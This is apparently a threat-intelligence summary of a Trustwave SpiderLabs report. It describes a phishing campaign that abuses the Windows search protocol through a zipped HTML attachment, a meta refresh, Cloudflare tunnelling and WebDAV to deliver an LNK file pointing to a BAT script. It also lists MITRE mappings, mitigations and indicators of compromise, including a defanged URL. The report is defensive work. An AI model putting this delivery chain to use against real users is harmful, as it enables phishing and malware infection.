Trustwave SpiderLabs has uncovered a sophisticated campaign that hides malicious activity inside an HTML attachment zipped in a phishing email to abuse Windows search. The operation relies on HTML, a meta refresh redirect, Cloudflare tunneling, and a single LNK file that points to a BAT script, requiring user interaction to proceed. #TrustwaveSpiderLabs #WindowsSearch
Keypoints
- The campaign begins with a suspicious email containing an HTML attachment wrapped in a ZIP archive to evade email scanners.
- The HTML attachment uses a meta refresh to automatically redirect via the Windows search protocol to a remote server with zero-delay.
- The attack exploits the search protocol by crafting query parameters (invoice-focused) and directing traffic through Cloudflare tunneling and WebDAV to present remote resources as local.
- After user consent, the search retrieves invoice-named files from the remote server; the results include a shortcut (LNK) that points to a BAT script on that server.
- The BAT payload could not be retrieved during analysis because the server appeared down, but the delivery chain demonstrates a high level of sophistication in abusing user behavior and Windows features.
- Mitigation includes disabling the search URI handler (registry edits) and updates deployed to identify the HTML pattern used in this abuse (MailMarshal customers).
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – The HTML attachment in the ZIP is used to deceive and deliver the exploit. “The HTML attachment in this campaign, while seemingly simple, is crafted to launch a sophisticated attack.”
- [T1027] Obfuscated/Compressed Files and Information – The HTML is compressed inside a ZIP to evade scanners. “This extra layer of obfuscation serves multiple purposes: Shrinks the file size for faster transmission; Sidesteps scanners that may overlook compressed contents.”
- [T1204] User Execution – The user is prompted to allow the search action, enabling the malicious operation. “When the HTML loads, browsers typically prompt the user to allow the search action. This security measure prevents unauthorized commands from executing potentially harmful operations without the user’s consent.”
- [T1090] Proxy – Attackers used Cloudflare tunneling (and WebDAV to present remote resources as local) to hide infrastructure and deceive. “Attackers abused Cloudflare’s tunneling service to hide their servers and mask their malicious operations.”
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – A BAT script is involved and could be triggered after the LNK leads to execution. “which, upon user click, could potentially trigger additional malicious operations.”
- [T1105] Ingress Tool Transfer – The search retrieves invoice-named files from a remote server, including an LNK that points to a BAT script hosted on the same server. “The search retrieves invoice-named files from a remote server. Only one item, particularly a shortcut (LNK) file, appears in the search results.”
Indicators of Compromise
- [File name] INVOICE#TBAVSA0JBSNA.html – The HTML attachment referenced in IOC context.
- [MD5] f77a4a27f749703165e2021fecd73db9 – Hash of the HTML payload.
- [SHA1] cbc3a8e762e0f2eda9e8a9bde348d04d1d7ce17e – Hash of the HTML payload.
- [SHA256] d136dcfc355885c502ff2c3be229791538541b748b6c07df3ced95f9a7eb2f30 – Hash of the HTML payload.
- [URL] tender-coding-bi-associate[.]trycloudflare[.]com@SSLDavWWWRootgoogleINVOICE – Remote server hosting the malicious content.